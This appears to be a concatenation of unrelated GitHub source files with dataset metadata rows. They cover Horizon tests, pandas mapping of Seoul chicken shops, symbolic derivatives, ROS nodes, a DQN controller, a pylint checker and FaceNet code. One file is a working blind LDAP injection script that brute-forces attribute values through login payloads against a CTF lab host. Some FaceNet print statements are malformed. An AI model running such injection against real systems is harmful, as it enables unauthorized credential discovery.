settings_page = self.home_pg.go_to_settings_usersettingspage()
settings_page.change_pagesize()
settings_page.find_message_and_dismiss(messages.SUCCESS)
volumes_backup_page = self.home_pg \
.go_to_compute_volumes_volumebackupspage()
volumes_backup_page.delete_volume_backups(backup_names)
volumes_backup_page.find_message_and_dismiss(messages.SUCCESS)
for name in backup_names:
volumes_backup_page.is_volume_backup_deleted(name)
class TestAdminVolumeBackups(helpers.AdminTestCase, TestVolumeBackups):
VOLUME_NAME = helpers.gen_random_resource_name("volume")
VOLUME_BACKUP_NAME = helpers.gen_random_resource_name("volume_backup")
| Mirantis/mos-horizon | openstack_dashboard/test/integration_tests/tests/test_volume_backups.py | test_volume_backups.py | py | 5,876 | python | en | code | 7 | github-code | 36 |
26034310554 | #!/usr/bin/env python
# coding: utf-8
# In[1]:
import pandas as pd
# In[2]:
commercial = pd.read_csv('./commercial.csv')
commercial
# In[3]:
# 끝에 5개 데이터만 추출
commercial.tail(5)
# In[5]:
list(commercial), len(list(commercial))
# In[7]:
commercial.groupby('상가업소번호')['상권업종소분류명'].count().sort_values(ascending=False)
# In[10]:
category_range = set(commercial['상권업종소분류명'])
category_range, len(category_range)
# In[11]:
commercial['도로명주소']
# In[15]:
# 서울시 데이터만 가져오기
# 3덩어리로 쪼갠 후 새로운 칼럼 추가
commercial[['시','구','상세주소']] = commercial['도로명주소'].str.split(' ',n=2, expand=True)
# In[16]:
commercial.tail(5)
# In[18]:
# 서울특별시의 데이터만 추출
seoul_data = commercial[ commercial['시'] == '서울특별시']
seoul_data.tail(5)
# In[22]:
# 서울만 있는지 확인하기(집합연산)
city_type = set(seoul_data['시'])
city_type
# In[24]:
# 서울 치킨집만 추출
seoul_chicken_data = seoul_data[ seoul_data['상권업종소분류명'] == '후라이드/양념치킨' ]
seoul_chicken_data
# In[31]:
sorted_chicken_count_by_gu = seoul_chicken_data.groupby('구')['상권업종소분류명'].count().sort_values(ascending=False)
sorted_chicken_count_by_gu
# In[33]:
import matplotlib.pyplot as plt
plt.rcParams['font.family'] = 'Malgun Gothic'
# In[34]:
plt.figure(figsize=(10,5))
plt.bar(sorted_chicken_count_by_gu.index, sorted_chicken_count_by_gu)
plt.title('구에 따른 치킨 매장 수')
plt.xticks(rotation = 90)
plt.show()
# In[38]:
# 지도에 그리기
import folium
import json
# In[41]:
# 지도정보 불러오기
seoul_geo = './seoul_geo.json'
geo_data = json.load(open(seoul_geo, encoding = 'utf-8'))
geo_data
# In[50]:
# 지도 만들기
map = folium.Map(location=[37.5502, 126.982], zoom_start=11)
map
# In[51]:
folium.Choropleth(geo_data = geo_data,
data=sorted_chicken_count_by_gu,
colums=[sorted_chicken_count_by_gu.index, sorted_chicken_count_by_gu],
fill_color='PuRd',
key_on='properties.name').add_to(map)
map
# In[ ]:
| dleorud111/chicken_data_geo_graph | 치킨 매장 수에 따른 지도 그리기.py | 치킨 매장 수에 따른 지도 그리기.py | py | 2,238 | python | ko | code | 0 | github-code | 36 |
14172419297 | from .expression_parser import ExpressionParser
class Number(object):
EPS = 0.00000001
def __init__(self, number):
self.number = number
def calculate(self, x):
return self.number
@staticmethod
def derivative():
return Number(0)
def equal(self, other):
return abs(other - self.number) < self.EPS
class Var(object):
def __init__(self):
pass
@staticmethod
def calculate(x):
return x
@staticmethod
def derivative():
return Number(1)
class Plus(object):
def __init__(self, expr1, expr2):
self.expr1 = expr1
self.expr2 = expr2
@staticmethod
def of(expr1, expr2):
if isinstance(expr1, Number) and expr1.equal(0):
return expr2
if isinstance(expr2, Number) and expr2.equal(0):
return expr1
if isinstance(expr1, Number) and isinstance(expr2, Number):
return Number(expr1.number + expr2.number)
return Plus(expr1, expr2)
def calculate(self, x):
return self.expr1.calculate(x) + self.expr2.calculate(x)
def derivative(self):
return Plus.of(self.expr1.derivative(), self.expr2.derivative())
class Minus(object):
def __init__(self, expr1, expr2):
self.expr1 = expr1
self.expr2 = expr2
@staticmethod
def of(expr1, expr2):
if isinstance(expr1, Number) and expr1.equal(0):
if isinstance(expr2, Number):
expr2.number *= -1.0
return expr2
if isinstance(expr2, Number) and expr2.equal(0):
return expr1
if isinstance(expr1, Number) and isinstance(expr2, Number):
return Number(expr1.number - expr2.number)
return Minus(expr1, expr2)
def calculate(self, x):
return self.expr1.calculate(x) - self.expr2.calculate(x)
def derivative(self):
return Minus.of(self.expr1.derivative(), self.expr2.derivative())
class Production(object):
def __init__(self, expr1, expr2):
self.expr1 = expr1
self.expr2 = expr2
@staticmethod
def of(expr1, expr2):
if isinstance(expr1, Number):
if expr1.equal(0):
return Number(0)
if expr1.equal(1):
return expr2
if isinstance(expr2, Number):
if expr2.equal(0):
return Number(0)
if expr2.equal(1):
return expr1
if isinstance(expr1, Number) and isinstance(expr2, Number):
return Number(expr1.number * expr2.number)
return Production(expr1, expr2)
def calculate(self, x):
return self.expr1.calculate(x) * self.expr2.calculate(x)
def derivative(self):
return Plus.of(Production.of(self.expr1.derivative(), self.expr2),
Production.of(self.expr2.derivative(), self.expr1))
class Division(object):
def __init__(self, expr1, expr2):
self.expr1 = expr1
self.expr2 = expr2
@staticmethod
def of(expr1, expr2):
if isinstance(expr1, Number) and expr1.equal(0):
return Number(0)
if isinstance(expr2, Number) and expr2.equal(1):
return expr1
if isinstance(expr1, Number) and isinstance(expr2, Number):
return Number(expr1.number / expr2.number)
return Division(expr1, expr2)
def calculate(self, x):
return self.expr1.calculate(x) / self.expr2.calculate(x)
def derivative(self):
return Division(
Minus.of(Production.of(self.expr1.derivative(), self.expr2),
Production.of(self.expr2.derivative(), self.expr1)),
Production.of(self.expr2, self.expr2))
class ExpressionBuilder(object):
_operations = {
"+": Plus.of,
"-": Minus.of,
"*": Production.of,
"/": Division.of,
}
def __init__(self, context, is_debug=False):
self._parser = ExpressionParser(is_debug)
self._context = context
def _build(self, node):
if node.is_term():
if node.type() == "number":
return Number(float(node.value()))
if node.type() == "var":
return Var()
children = node.children()
if node.type() == "func":
return self._context[children[0].value()](
self._build(children[1])
)
if node.type() == "param_func":
return self._context[children[0].value()](
float(children[1].value()),
self._build(children[2])
)
return self._operations[node.type()](
self._build(children[0]),
self._build(children[1])
)
def build(self, input_str):
tree = self._parser.parse(input_str)
return self._build(tree)
| sidrDetyam/numerical_math | expressions/expression_builder.py | expression_builder.py | py | 4,862 | python | en | code | 0 | github-code | 36 |
23232107868 | import rclpy # ROS client library
from rclpy.node import Node
from rclpy.qos import qos_profile_sensor_data
from sensor_msgs.msg import LaserScan
from geometry_msgs.msg import Twist
class Tb3(Node):
def __init__(self):
super().__init__('tb3')
self.cmd_vel_pub = self.create_publisher(
Twist,
'cmd_vel',
1)
self.scan_sub = self.create_subscription(
LaserScan,
'scan',
self.scan_callback,
qos_profile_sensor_data)
self.minimum_distance = 0.2
self.starting_distance = 0
self.lin_vel_percent = 0
self.ang_vel_percent = 0
# Gradual acceleration and deceleration parameters
self.acceleration_rate = 1
self.deceleration_rate = 1
def vel(self, lin_vel_percent, ang_vel_percent=0):
MAX_LIN_VEL = 0.1
MAX_ANG_VEL = 1.82
cmd_vel_msg = Twist()
cmd_vel_msg.linear.x = MAX_LIN_VEL * lin_vel_percent / 100
cmd_vel_msg.angular.z = MAX_ANG_VEL * ang_vel_percent / 100
self.cmd_vel_pub.publish(cmd_vel_msg)
self.ang_vel_percent = ang_vel_percent
self.lin_vel_percent = lin_vel_percent
def scan_callback(self, msg):
if self.starting_distance == 0:
self.starting_distance = msg.ranges[0]
current_distance = msg.ranges[0]
if current_distance < self.minimum_distance:
self.vel(0)
else:
velocity = 0
current_distance_pc = current_distance / self.starting_distance
if current_distance_pc >= 0.5:
# Gradual acceleration
velocity = min(self.lin_vel_percent + self.acceleration_rate, 100)
elif current_distance_pc < 0.5:
# Gradual deceleration
velocity = max(self.lin_vel_percent - self.deceleration_rate, 5)
print(velocity)
self.vel(velocity)
def main(args=None):
rclpy.init(args=args)
tb3 = Tb3()
print('waiting for messages....')
try:
rclpy.spin(tb3) # Execute tb3 node
# Blocks until the executor (spin) cannot work
except KeyboardInterrupt:
pass
tb3.destroy_node()
rclpy.shutdown()
if __name__ == '__main__':
main()
| abysrising/PLV_Robot_Programming | challenge1.py | challenge1.py | py | 2,332 | python | en | code | 0 | github-code | 36 |
16162642541 | #!/usr/bin/env python3
import RPi.GPIO as GPIO
import rospy
from std_msgs.msg import Int32
ENCODER_PIN = 26
GPIO.setmode(GPIO.BCM)
GPIO.setup(ENCODER_PIN, GPIO.IN, pull_up_down=GPIO.PUD_UP)
def encoder_callback():
count = 0
last_state = GPIO.input(ENCODER_PIN)
pub = rospy.Publisher('/encoder_count', Int32, queue_size=10)
rate = rospy.Rate(500)
while not rospy.is_shutdown():
current_state = GPIO.input(ENCODER_PIN)
if current_state != last_state:
count += 1
rospy.loginfo("Encoder Count: {}".format(count))
pub.publish(count)
last_state = current_state
rate.sleep()
if __name__ == '__main__':
try:
rospy.init_node('encoder_node')
encoder_callback()
finally:
GPIO.cleanup()
| oguzhanbzglu/SergeantBot | idu_robot/scripts/encoder_node.py | encoder_node.py | py | 801 | python | en | code | 2 | github-code | 36 |
27823324545 | import requests
from bs4 import BeautifulSoup
import zlib #crc32加密
list_cyc32=[]
list_url=[]
import re
# # 为了用xpath
user_agent = 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0'
headers = {'User-Agent': user_agent}
# url="https://www.cnblogs.com/mayswind/p/15116918.html"
url="https://www.cnblogs.com/mayswind/default.html?page=3"
r = requests.get(url, headers=headers)
r.encoding = 'utf-8'
result=[]
soup=BeautifulSoup(r.text,'lxml')
#############crc32加密 只需要传str类型就行################
def crc32(x_url):
return zlib.crc32(bytes(x_url, "utf-8"))
#############crc32加密 只需要传str类型就行################
############ 传入url 得到soup###########################
def get_soup (url):
user_agent = 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0'
headers = {'User-Agent': user_agent}
r = requests.get(url, headers=headers)
r.encoding = 'utf-8'
result=[]
soup = BeautifulSoup(r.text, 'lxml')
return soup
############ 传入url 得到soup###########################
#############找到作者所有的文章##########################
def fd_all(url):
global list_cyc32
for i in range(1, 9999):
url = "/".join(url.split("/")[0:4]) + "/default.html?page=" + str(i)
if (get_soup(url).find_all(name='a', attrs={'class': 'postTitle2 vertical-middle'}) == []):
break
items = get_soup(url).find_all(name='a', attrs={'class': 'postTitle2 vertical-middle'})
for i in items:
list_cyc32 = crc32(i.get('href'))
list_url=i.get('href')
#############找到作者所有的文章##########################
print(crc32(url))
print(list_url) | Madlife1/pythonProject2 | url_spider.py | url_spider.py | py | 1,896 | python | en | code | 0 | github-code | 36 |
73202442984 | from datetime import datetime
from shapely.geometry import Point
import numpy as np
from typing import List
GEODATUM_MAPPING = {
"WGS 1984": "epsg:4326",
"Ordnance Survey Great Britain 1936": "epsg:4277",
"TWD 1967": "epsg:3828",
"Gauss Krueger Meridian2": None,
"Gauss Krueger Meridian3": None,
"Gauss Krueger Austria M34": "epsg:18009",
"Gauss Krueger Austria M31": "epsg:18008",
"Rijks Driehoekstelsel": "epsg:28992",
"JRC": "epsg:3040",
"DWD": None,
"KNMI Radar": None,
"CH1903": "epsg:4149",
"PAK1": None,
"PAK2": None,
"SVY21": "epsg:3414",
}
def camel_to_snake_case(camel_case: str) -> str:
"""
Convert camelCase to snake_case
Args:
camel_case (str): sentence in camelCase (e.g. myInputVariable)
Returns:
str: converted sentence in snake_case (in example my_input_variable)
"""
return "".join(["_" + i.lower() if i.isupper() else i for i in camel_case]).lstrip(
"_"
)
def snake_to_camel_case(snake_case: str) -> str:
"""
Convert snake_case to camelCase
Args:
snake_case (str): sentence in snake_case (in example my_input_variable)
Returns:
str: converted sentence in camelCase (e.g. myInputVariable)
"""
words = snake_case.split("_")
return words[0] + "".join(i.title() for i in words[1:])
def dict_to_datetime(data: dict) -> datetime:
"""
Convert a FEWS PI datetime dict to datetime object
Args:
data (dict): FEWS PI datetime (e.g. {'date': '2022-05-01', 'time': '00:00:00'})
Returns:
datetime: Converted datetime object (in example datetime.datetime(2022, 5, 1, 0, 0))
"""
if "time" in data.keys():
time = data["time"]
else:
time = "00:00:00"
date_time = datetime.fromisoformat(f'{data["date"]}T{time}')
return date_time
def datetime_to_fews_str(date_time: datetime) -> str:
"""
Convert a FEWS PI datetime dict to datetime object
Args:
date_time (datetime): datetime object (e.g. datetime.datetime(2022, 5, 1, 0, 0))
Returns:
datetime: Converted datetime for FEWS REST API format %Y-%m-%dT%H:%M:%SZ
(in example 2022-05-01T00:00:00Z)
"""
return date_time.strftime("%Y-%m-%dT%H:%M:%SZ")
def xy_array_to_point(xy_array: np.ndarray) -> List[Point]:
return [Point(i.astype(float)) for i in xy_array]
def attributes_to_array(attribute_values: np.ndarray, attributes: list) -> np.ndarray:
def _get_values(x, attributes):
selection = {i["id"]: i["value"] for i in x if i["id"] in attributes}
return [selection[i] if i in selection.keys() else None for i in attributes]
return np.array([_get_values(i, attributes) for i in attribute_values])
def geo_datum_to_crs(geo_datum: str) -> str:
if geo_datum.startswith("UTM"):
epsg_code = 32600
zone = int(geo_datum[3:5].lstrip("0"))
epsg_code += int(zone)
if geo_datum[-1] == "S":
epsg_code += 100
crs = f"epsg:{epsg_code}"
elif geo_datum.lower().startswith("epsg"):
crs = geo_datum.lower()
elif geo_datum in GEODATUM_MAPPING.keys():
crs = GEODATUM_MAPPING[geo_datum]
else:
crs = None
return crs
| d2hydro/fewspy | src/fewspy/utils/conversions.py | conversions.py | py | 3,271 | python | en | code | 2 | github-code | 36 |
3987982365 | import pandas as pd
import numpy as np
import tensorflow as tf
import shutil
from .memories import VanillaMemory
from .agents import DQNAgent
from .gymRoom import *
from .utils import *
from .gymProfile import *
import subprocess
import threading
def thread1():
# Open starccm+ server in Linux background
subprocess.call("cd javafile && " + start_starccm_server, shell=True)
def thread2():
# Thread 2 executes Java macro commands continuously in the background,
# and each round of loop represents a round
for i in range(100000):
subprocess.call(runforStep_gymGame_command, shell=True)
def run(env, a):
# Modify the messenger to check info Java release, execute the next macro command
with open("javafile/info.txt", "w") as f:
f.write("false")
thread_thred1 = threading.Thread(target=thread1)
thread_thred1.start()
time.sleep(2)
#Create a path to the generated file.
# out/logs/ is mainly used to store log files.
# out/csvfile/ is the record of each round.
# out/savemodel/ is used to save model super parameters
all_log_path = ['out/logs/', 'out/csvfile/', 'out/tensorboard', 'out/savemodel/local/', 'out/savemodel/target/']
for pathName in all_log_path:
if not os.path.exists(pathName):
os.makedirs(pathName)
# log enable
log()
# Delete historical files existing in the system
checkExistFile()
Reward_history = []
FanPower_history = []
# Let macro commands hang in the background
thread_thred2 = threading.Thread(target=thread2)
thread_thred2.start()
eposideFlag = True
while True: # Run until solved
# print(threading.active_count())
# Delete "RHfiles.csv" generated by history
if os.path.exists(RHfile):
os.remove(RHfile)
# Initialization of rewards and fan_power in a round
rewards_history = []
fan_power_history = []
# Select initial action
startAction = [50, 50, 50, 0, 0, 0]
# Simulation environment initialization
env.make(startAction)
time.sleep(6)
stepFlag = True
while True:
# Get the current environment
state, _ = env.state(a.t_step)
# Get the current action according to the environment
action = a.act(state)
# Modify the action and execute the simulation environment
state_next, reward, done, fan_power = env.steprun(action, a.t_step)
# # Recalculate if model floating-point overflow
state_flag = np.mean(state_next)
if state_flag > 61 or state_flag < 40:
stepFlag = False
break
# Store the reward and fan_power of each step in a round
rewards_history.append(reward)
fan_power_history.append(fan_power)
print("timestep", a.t_step, "action:", action, "reward:", reward, "fanpower:",
fan_power)
# Store data and train models
a.step(state, action, reward, state_next, done)
# Judge whether to end the round
if done is True:
break
# If the model diverges, this round will not be recorded
if stepFlag is False:
eposideFlag = False
continue
if eposideFlag is False:
eposideFlag = True
continue
episode = a.episodes - 1
Reward_history.append(sum(rewards_history))
FanPower_history.append(sum(fan_power_history))
print('episode', episode, 'score', sum(rewards_history), 'score_max', max(Reward_history), "FanPowerSUM",
sum(fan_power_history))
# save episode_reward_history and each_episode_rewards_history
name = [str(episode)]
pd.DataFrame(data=[rewards_history], index=name). \
to_csv(each_episode_rewards_history_csv, sep=',', mode='a', encoding='utf-8')
pd.DataFrame(data=[fan_power_history], index=name). \
to_csv(each_FanPower_history_csv, sep=',', mode='a', encoding='utf-8')
pd.DataFrame(data=[Reward_history], index=name). \
to_csv(episode_reward_history_csv, sep=',', encoding='utf-8')
pd.DataFrame(data=[FanPower_history], index=name). \
to_csv(FanPower_history_csv, sep=',', encoding='utf-8')
pd.DataFrame(data=np.array([a.losses]).reshape(-1, 1)). \
to_csv(Loss_history_csv, encoding='utf-8')
# Save RHfile.csv history of each round as RHfile_episode.csv
dstFile = all_log_path[1] + 'RHfile_' + str(episode) + '.csv'
try:
shutil.copyfile(RHfile, dstFile)
except Exception as e:
print(e)
# Save model super parameters
if episode % 100 == 0:
# a.network_local.save_weights(all_log_path[3] + 'RHfile_' + str(episode))
a.network_target.save_weights(all_log_path[4] + 'RHfile_' + str(episode))
# Judge the conditions for model convergence and training completion
if len(Reward_history) >= 10 and (np.mean(Reward_history[-10:])) > 20:
print("Solved at episode {}!".format(episode))
break | danfenggithub/HumidityControl | solutions/run.py | run.py | py | 5,234 | python | en | code | 6 | github-code | 36 |
7004766354 | #!/usr/bin/python
from bs4 import BeautifulSoup
import requests
import time
import sys
import urllib
from itertools import chain
import argparse
url = "http://10.10.10.122/login.php"
startUrl = "http://10.10.10.122/"
proxyValues = {'http': 'http://127.0.0.1:8080'}
SLEEP_VALUE = 3
lower_letters = range(97,123)
upper_letters = range(65,91)
number_set = range(48,58)
#r= requests.get(url)
#sessionCookie = r.cookies
#print (r.text)
testRange = range(107,109)
#print ("*** Sleeping for %d seconds***" % SLEEPVALUE)
#time.sleep(SLEEPVALUE) #sleep little baby
def findLDAPAttribute(sessionID, lineList, pl,fullRange):
failedList = []
foundAttributeDict = {}
foundAttribute = ''
foundValue =''
#fullRange = chain(lower_letters)
headerValues = {'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0',
'Accept' :'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Referer': 'http://10.10.10.122/login.php',
'Connection': 'close'}
#iterate through attributes
for i in lineList:
token = ''
#payload = 'ldapuser)(|(' + i +'=*)'
#payload = pre + i + post
giveUp = False;
fullIteration = 0
while (giveUp!= True):
fullIteration=len(token)
for character in fullRange:
payload = pl.format(i,token+chr(character)+'*')
#double url encoding is needed
print ("trying payload %s" % payload)
payload = urllib.parse.quote_plus(payload)
reqdata = {'inputUsername' : payload, 'inputOTP': '123456'}
with requests.session() as s:
try:
s.keep_alive = False
r = s.post(url,cookies={'PHPSESSID':sessionID}, data=reqdata, headers=headerValues, proxies=proxyValues)
#non proxy -
#r = s.post(url,cookies={'PHPSESSID':sessionID}, data=reqdata, headers=headerValues)
except Exception as e:
print(repr(e))
failedList.append(i)
finally:
s.close()
#looking for result
soup = BeautifulSoup(r.text, 'html.parser')
resultSet = soup.findAll( "div", {"class":"col-sm-10"})
if len(resultSet[0].text) > 1:
#if we end up with the failed double url decoding in result, then we need to ignore it
if "%" not in resultSet[0].text:
#"Cannot login" is the indicator for the blind injection
#add the current character to our token
token += chr(character)
print ("Found a value in attribute %s of value %s" % (i,token))
foundAttribute = i
foundValue = resultSet[0].text
else:
print ("no value for %s on length %d with length %d" % (i,len(resultSet[0].text), len(r.text) ))
time.sleep(SLEEP_VALUE)
#if the length of the token has not increased, then we're out of options..
if (len(token) == fullIteration):
giveUp=True #move to the next attribute
print ("We are at %s" %token)
if len(token) > 0:
foundAttributeDict.update({foundAttribute:token})
print ("All done! values are %s : %s" % (foundAttribute,token))
finalVal = "Attribute is [" + foundAttribute + "] with value [" + token +"]"
if len (failedList) > 0:
print ("We failed on attributes " + str(failedList))
for keys,value in foundAttributeDict.items():
print (keys, value)
return foundAttributeDict
def main():
parser = argparse.ArgumentParser(description='blind ldap injector')
parser.add_argument('--option', '-o', help = "1-Upper,2-Lower,3-Numbers,4-LowerNumbers,5-all", required=True, choices={1,2,3,4,5}, type=int)
parser.add_argument('--attribFile', '-f', help = "attribute file", required=True)
parser.add_argument('--sessionID', '-s', help = "phpsession id", required= True)
args = parser.parse_args()
sessionID = args.sessionID
filename = args.attribFile
options = args.option
#filename = sys.argv[1]
with open (filename,'r') as f:
#lineList = f.readlines()
lineList = [line.rstrip() for line in f]
#sessionID = 'e3i2o514r6ltme1cno3skji8s7'
print ("Starting with SessionID %s Filename %s Option - %d" % (sessionID,filename,options))
fullRange = ''
if options == 1: fullRange = upper_letters
elif options == 2: fullRange =lower_letters
elif options==3: fullRange = number_set
elif options==4: fullRange =chain(lower_letters,number_set)
elif options==5: fullRange = chain(upper_letters,lower_letters,number_set)
print (fullRange)
#testcase = findLDAPAttribute(sessionID,lineList,'*)(','=ldapuser)')
#print (testcase)
#lets look for attributes based on the payload *)
payload = '*)({0}={1}'
testcase = findLDAPAttribute(sessionID,lineList,payload,fullRange)
# print (foundAttributeDict)
payload = 'ldapuser)({0}={1}'
testcase =findLDAPAttribute(sessionID,lineList,payload,fullRange)
#this test case works - can get "CANNOT LOGIN" for cn=ldauser*
#testcase = findLDAPAttribute(sessionID,lineList,'*)(','=ldapuse*')
#print (testcase)
if __name__ == '__main__':
sys.exit(main())
#print ("Message is of length %d and is [%s]" % (len(resultSet[0].text), resultSet[0].text))
#print (r.text)
| nutty-guineapig/htb-pub | CTF/blindLDAPInjector.py | blindLDAPInjector.py | py | 5,035 | python | en | code | 0 | github-code | 36 |
15980397887 | """Check for usage of models that were replaced in 2.0."""
from pylint.checkers import BaseChecker
from pylint.interfaces import IAstroidChecker
class NautobotReplacedModelsImportChecker(BaseChecker):
"""Visit 'import from' statements to find usage of models that have been replaced in 2.0."""
__implements__ = IAstroidChecker
version_specifier = ">=2,<3"
name = "nautobot-replaced-models"
msgs = {
"E4211": (
"Imports a model that has been replaced (dcim.DeviceRole -> extras.Role).",
"nb-replaced-device-role",
"Reference: https://docs.nautobot.com/projects/core/en/next/development/apps/migration/model-updates/extras/#replace-role-related-models-with-generic-role-model",
),
"E4212": (
"Imports a model that has been replaced (dcim.RackRole -> extras.Role).",
"nb-replaced-rack-role",
"Reference: https://docs.nautobot.com/projects/core/en/next/development/apps/migration/model-updates/extras/#replace-role-related-models-with-generic-role-model",
),
"E4213": (
"Imports a model that has been replaced (ipam.Role -> extras.Role).",
"nb-replaced-ipam-role",
"Reference: https://docs.nautobot.com/projects/core/en/next/development/apps/migration/model-updates/extras/#replace-role-related-models-with-generic-role-model",
),
"E4214": (
"Imports a model that has been replaced (dcim.Region -> dcim.Location).",
"nb-replaced-region",
"Reference: https://docs.nautobot.com/projects/core/en/next/development/apps/migration/model-updates/dcim/#replace-site-and-region-with-location-model",
),
"E4215": (
"Imports a model that has been replaced (dcim.Site -> dcim.Location).",
"nb-replaced-site",
"Reference: https://docs.nautobot.com/projects/core/en/next/development/apps/migration/model-updates/dcim/#replace-site-and-region-with-location-model",
),
"E4216": (
"Imports a model that has been replaced (ipam.Aggregate -> ipam.Prefix).",
"nb-replaced-aggregate",
"Reference: https://docs.nautobot.com/projects/core/en/next/development/apps/migration/model-updates/ipam/#replace-aggregate-with-prefix",
),
}
def visit_importfrom(self, node):
if node.modname == "nautobot.dcim.models":
for name, _ in node.names:
if name == "DeviceRole":
self.add_message("nb-replaced-device-role", node=node)
elif name == "RackRole":
self.add_message("nb-replaced-rack-role", node=node)
elif name == "Region":
self.add_message("nb-replaced-region", node=node)
elif name == "Site":
self.add_message("nb-replaced-site", node=node)
if node.modname == "nautobot.ipam.models":
for name, _ in node.names:
if name == "Role":
self.add_message("nb-replaced-ipam-role", node=node)
elif name == "Aggregate":
self.add_message("nb-replaced-aggregate", node=node)
| nautobot/pylint-nautobot | pylint_nautobot/replaced_models.py | replaced_models.py | py | 3,231 | python | en | code | 4 | github-code | 36 |
44258229341 | import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
import tensorflow as tf
import tensorflow.keras.backend as K
# from keras.models import load_model
from tensorflow.keras.models import load_model
from os import listdir
from os.path import isdir
from PIL import Image
import numpy as np
from numpy import load
from numpy import expand_dims
from numpy import asarray
from sklearn.metrics import accuracy_score, pairwise_distances
from sklearn.preprocessing import LabelEncoder
from sklearn.preprocessing import Normalizer
from sklearn.svm import SVC
from tqdm import tqdm
def extract_face(filename, required_size=(160, 160)):
"""
Extract a single face from a given photograph
Inputs:
- filename: path of a file to be converted
Returns:
- face_array: array of face image pixel with RGB channel
"""
image = Image.open(filename)
image = image.convert('RGB')
pixels = asarray(image)
face_array = pixels
return face_array
def load_faces(directory):
"""
Load images and extract faces for all images in a directory
Inputs:
- directory: path of a directory which has same person's face
Returns:
- face: list of face array
"""
faces = list()
for filename in listdir(directory):
path = directory + filename
face = extract_face(path)
faces.append(face)
return faces
def load_dataset(directory):
"""
Load a dataset that contains one subdir for each class that in turn contains images
Inputs:
- directory: path of a directory which has all the train data or test data
Returns:
- asarray(X): face image array
- asarray(y): class label array
"""
X, y = list(), list()
for subdir in listdir(directory):
path = directory + subdir + '/'
if not isdir(path):
continue
if subdir.startswith('.'):
continue
faces = load_faces(path)
labels = [subdir for _ in range(len(faces))]
X.extend(faces)
y.extend(labels)
return asarray(X), asarray(y)
def get_embedding(model, face_pixels):
"""
Get the face embedding for one face
Inputs:
- model: facenet model which output 128-dim embedding
- face_pixels: image array of a face
Returns:
- yhat[0]: embedding of a face
"""
face_pixels = face_pixels.astype('float32')
mean, std = face_pixels.mean(), face_pixels.std()
face_pixels = (face_pixels - mean) / std
samples = expand_dims(face_pixels, axis=0)
yhat = model.predict(samples)
return yhat[0]
def contrastive_loss(y, emb1, emb2, margin=1.0):
"""
Compute the contrastive loss for two embeddings
Inputs:
- y: value of 1 if emb1 and emb2 are same person's face, 0 if not
- emb1: embedding of a face
- emb2: embedding of a face
Returns:
- loss
"""
#### Question (b): your implementation starts here (don't delete this line)
print(emb1.shape, emb2.shape)
y_pred = tf.linalg.norm(emb1 - emb2)
y = tf.cast(y, y_pred.dtype)
loss = y * tf.math.square(y_pred) + (1.0 - y) * tf.math.square(
tf.math.maximum(margin - y_pred, 0.0)
)
#### Question (b): your implementation ends here (don't delete this line)
return loss
def triplet_loss(anchor, emb1, emb2, margin=1.0):
"""
Compute the contrastive loss for two embeddings
Inputs:
- anchor: embedding of a face which to be the standard
- emb1: embedding of a positive face
- emb2: embedding of a negative face
Returns:
- loss
"""
#### Question (c): your implementation starts here (don't delete this line)
d_pos = tf.reduce_sum(tf.square(anchor - emb1))
d_neg = tf.reduce_sum(tf.square(anchor - emb2))
loss = tf.maximum(0., margin + d_pos - d_neg)
loss = tf.reduce_mean(loss)
#### Question (c): your implementation ends here (don't delete this line)
return loss
def main():
# load train dataset
trainX, trainy = load_dataset('./LFW/train/')
print(trainX.shape, trainy.shape)
# load test dataset
testX, testy = load_dataset('./LFW/val/')
print(testX.shape, testy.shape)
# load the pre-trained facenet model
model = load_model('facenet_keras.h5', compile=False)
# convert each face in the train set to an embedding
print('[INFO] calculating train data embedding ...')
newTrainX = list()
for face_pixels in tqdm(trainX):
embedding = get_embedding(model, face_pixels)
newTrainX.append(embedding)
trainX = asarray(newTrainX)
# convert each face in the test set to an embedding
print('[INFO] calculating test data embedding ...')
newTestX = list()
for face_pixels in tqdm(testX):
embedding = get_embedding(model, face_pixels)
newTestX.append(embedding)
testX = asarray(newTestX)
# normalize input vectors
in_encoder = Normalizer(norm='l2')
trainX = in_encoder.transform(trainX)
testX = in_encoder.transform(testX)
# label encode targets
out_encoder = LabelEncoder()
out_encoder.fit(trainy)
trainy = out_encoder.transform(trainy)
testy = out_encoder.transform(testy)
'''
Generate linear classifier model which name is 'model'
'''
#### Question (a): your implementation starts here (don't delete this line)
model = SVC(gamma='auto', verbose=True)
#### Question (a): your implementation ends here (don't delete this line)
# train
print('[INFO] model is training ...')
model.fit(trainX, trainy)
print('[INFO] training is done.')
# predict
yhat_train = model.predict(trainX)
yhat_test = model.predict(testX)
# score
score_train = accuracy_score(trainy, yhat_train)
score_test = accuracy_score(testy, yhat_test)
# summarize
print('Accuracy: train=%.3f, test=%.3f' % (score_train*100, score_test*100))
#loss function test with sample data
print('Contrastive loss for same face: f' % (contrastive_loss(1,trainX[0], trainX[1])))
print('Contrastive loss for different face: f' % (contrastive_loss(0,trainX[0], trainX[100])))
print('Triplet loss: f' % (triplet_loss(trainX[0], trainX[0], trainX[100])))
if __name__ == '__main__':
main()
| vgthengane/pytorch-cv-models | h4_face.py | h4_face.py | py | 6,258 | python | en | code | 1 | github-code | 36 |
74517744744 | # -*- coding: utf-8 -*-
"""
Created on Mon Aug 3 19:54:04 2020
@author: Tomi
This contains solutions to some list exercises from the
Python for Everybody (py4e) Course
"""
import sys
def max_and_min():
'''prompt user for numbers and compute max and min'''
number_list = []
while True:
prompt = input('Enter number: ')
try:
value = float(prompt)
number_list.append(value)
except (TypeError, ZeroDivisionError, ValueError):
if prompt == 'done' or prompt == 'Done':
break
else:
print('enter a numerical value')
maximum = max(number_list)
minimum = min(number_list)
print('Max:', maximum, 'Min:', minimum)
#max_and_min()
def confidence_value():
'''compute average c value'''
fname = input('Enter file name: ')
try:
fhand = open(fname)
except FileNotFoundError:
if fname == 'na na boo boo':
print("NA NA BOO BOO TO YOU - "
"You've been punk'd!")
else:
print('File does not exist')
sys.exit()
count = 0
confidencesum = 0
for line in fhand:
